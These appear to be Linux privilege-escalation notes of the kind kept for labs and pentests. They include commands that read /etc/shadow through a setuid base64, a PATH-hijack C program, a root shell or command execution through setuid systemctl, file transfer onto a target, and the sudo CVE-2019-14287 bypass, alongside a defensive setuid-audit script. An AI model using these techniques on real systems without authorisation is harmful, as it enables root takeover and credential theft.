Privilege Escalation

Useful websites

https://gtfobins.github.io/

https://github.com/carlospolop/PEASS-ng

Enumeration

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

https://www.kali.org/tools/enum4linux/

https://github.com/linted/linuxprivchecker

If you use LinPEAS, you can run the script, save its output and read it back with colours preserved like this:

./LinPeas.sh | tee res
less -r res

This website lists all Linux kernel CVEs: https://www.linuxkernelcves.com/cves

We can look for SUID (Set User ID) files:

find / -type f -perm -04000 -ls 2>/dev/null
1856     84 -rwsr-xr-x   1 root     root               85064 May 28  2020 /usr/bin/chfn
2300     32 -rwsr-xr-x   1 root     root               31032 Aug 16  2019 /usr/bin/pkexec
1816    164 -rwsr-xr-x   1 root     root              166056 Jul 15  2020 /usr/bin/sudo
1634     40 -rwsr-xr-x   1 root     root               39144 Jul 21  2020 /usr/bin/umount
1860     68 -rwsr-xr-x   1 root     root               68208 May 28  2020 /usr/bin/passwd
1859     88 -rwsr-xr-x   1 root     root               88464 May 28  2020 /usr/bin/gpasswd
1507     44 -rwsr-xr-x   1 root     root               44784 May 28  2020 /usr/bin/newgrp
1857     52 -rwsr-xr-x   1 root     root               53040 May 28  2020 /usr/bin/chsh
1722     44 -rwsr-xr-x   1 root     root               43352 Sep  5  2019 /usr/bin/base64
1674     68 -rwsr-xr-x   1 root     root               67816 Jul 21  2020 /usr/bin/su
2028     40 -rwsr-xr-x   1 root     root               39144 Mar  7  2020 /usr/bin/fusermount
2166     56 -rwsr-sr-x   1 daemon   daemon             55560 Nov 12  2018 /usr/bin/at
1633     56 -rwsr-xr-x   1 root     root               55528 Jul 21  2020 /usr/bin/mount

In the listing above, the 's' in the owner's execute position means the file runs with the permissions of its owner rather than of the caller. Here base64 is setuid root, so the current user can run it with root permissions and read files that are otherwise protected. For instance:

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode

The command below lists the top-level directories under which the current user has writable files:

find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
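As a defensive counterpart to the SUID listing above, here is an added Python example (not from the original notes) that parses find -ls output and flags setuid files that are world-writable or missing from an allowlist; the allowlist and the /opt/backup/helper line are constructed for the example.

```python
import subprocess

# Constructed sample of `find / -type f -perm -04000 -ls` output: four lines taken
# from the listing above plus one made-up world-writable helper under /opt.
SAMPLE_FIND_LS = """\
1856     84 -rwsr-xr-x   1 root     root               85064 May 28  2020 /usr/bin/chfn
1722     44 -rwsr-xr-x   1 root     root               43352 Sep  5  2019 /usr/bin/base64
2166     56 -rwsr-sr-x   1 daemon   daemon             55560 Nov 12  2018 /usr/bin/at
1633     56 -rwsr-xr-x   1 root     root               55528 Jul 21  2020 /usr/bin/mount
4242     16 -rwsrwxrwx   1 root     root               16384 Jan  1  2021 /opt/backup/helper
"""

# Assumed allowlist of binaries that carry setuid on a stock Debian/Ubuntu install.
# Tune it to your own golden image; anything outside it deserves a second look.
EXPECTED_SUID = {
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/fusermount", "/usr/bin/pkexec", "/usr/bin/at",
}

def parse_find_ls(text):
    """Turn `find -ls` lines into (mode, owner, group, path) tuples."""
    entries = []
    for line in text.splitlines():
        # inode blocks mode links owner group size month day year|time path;
        # maxsplit=10 keeps any spaces inside the path intact.
        fields = line.split(None, 10)
        if len(fields) == 11:
            entries.append((fields[2], fields[4], fields[5], fields[10]))
    return entries

def audit_suid(text, expected=EXPECTED_SUID):
    """Return (path, reason) pairs for setuid files that need review."""
    findings = []
    for mode, owner, group, path in parse_find_ls(text):
        if mode[3] not in "sS":      # owner-execute slot: 's'/'S' means setuid
            continue
        if mode[8] == "w":           # world-writable: anyone can swap in their own code
            findings.append((path, "world-writable setuid binary"))
        if path not in expected:
            findings.append((path, f"setuid binary not in allowlist ({owner}:{group})"))
    return findings

if __name__ == "__main__":
    # Live run of the same find command; stderr is captured and simply not shown.
    out = subprocess.run(["find", "/", "-type", "f", "-perm", "-04000", "-ls"],
                         capture_output=True, text=True).stdout
    for path, reason in audit_suid(out):
        print(f"{reason}: {path}")
```

Running it on the sample flags base64 (setuid but not on the allowlist, exactly the anomaly exploited above) and the helper twice; on a live host, diff its output against a known-good baseline.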

Exploit PATH

$ cat main.c
#include <stdlib.h>
#include <unistd.h>

int main(void){
    /* only succeeds because the binary itself is setuid root */
    setuid(0);
    setgid(0);
    /* "hacked" is not an absolute path, so the shell resolves it through PATH */
    system("hacked");
    return 0;
}
$ gcc main.c -o hacked
$ echo '/bin/bash' > /tmp/hacked
$ chmod 777 /tmp/hacked

Kernel exploit

https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl

Useful commands

# On the attacker machine, serve the current directory
python3 -m http.server 8080
# On the target machine, download the file (-O keeps the remote file name)
curl -O http://ip:8080/myFileToGet

Find SUID/GID

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

systemctl SUID

If systemctl has the SUID bit set:

ls -la /bin/systemctl
-rwsr-xr-x 1 root root 1115760 sept. 19 18:57 /bin/systemctl

We can create a new service:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

https://hackingeek.com/ce-quil-faut-comprendre-en-linux-permissions-suid-sgid-sticky-bit/

Sudo

If sudo -l gives this result for the user:

$ sudo -l
User james may run the following commands on ubuntu:
    (ALL, !root) /bin/bash

and the sudo version is lower than 1.8.28:

$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

you can exploit CVE-2019-14287: https://www.exploit-db.com/exploits/47502 (the fix shipped in sudo 1.8.28, so updating sudo closes it).